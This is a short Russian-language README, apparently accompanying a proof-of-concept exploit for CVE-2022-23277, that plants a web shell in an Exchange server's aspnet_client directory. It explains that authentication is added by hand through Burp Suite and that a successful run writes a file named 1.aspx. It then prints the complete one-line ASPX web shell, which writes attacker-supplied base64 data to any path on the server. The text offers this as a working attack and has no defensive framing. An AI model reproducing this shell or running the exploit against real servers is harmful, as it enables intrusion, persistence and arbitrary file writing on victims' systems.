
CVE-2022-23277 POC для записи веб-шелла в aspnet_client
Часть аутентификации необходимо добавить вручную через Burp Suite. После успешной эксплуатации в каталоге aspnet_client будет записан файл 1.aspx.
webshell:
<%@ Page Language="JScript" Debug="true"%><%@Import Namespace="System.IO"%><%File.WriteAllBytes(Request["b"], Convert.FromBase64String(Request["a"]));%>
Подробности эксплуатации можно найти в нашей статье
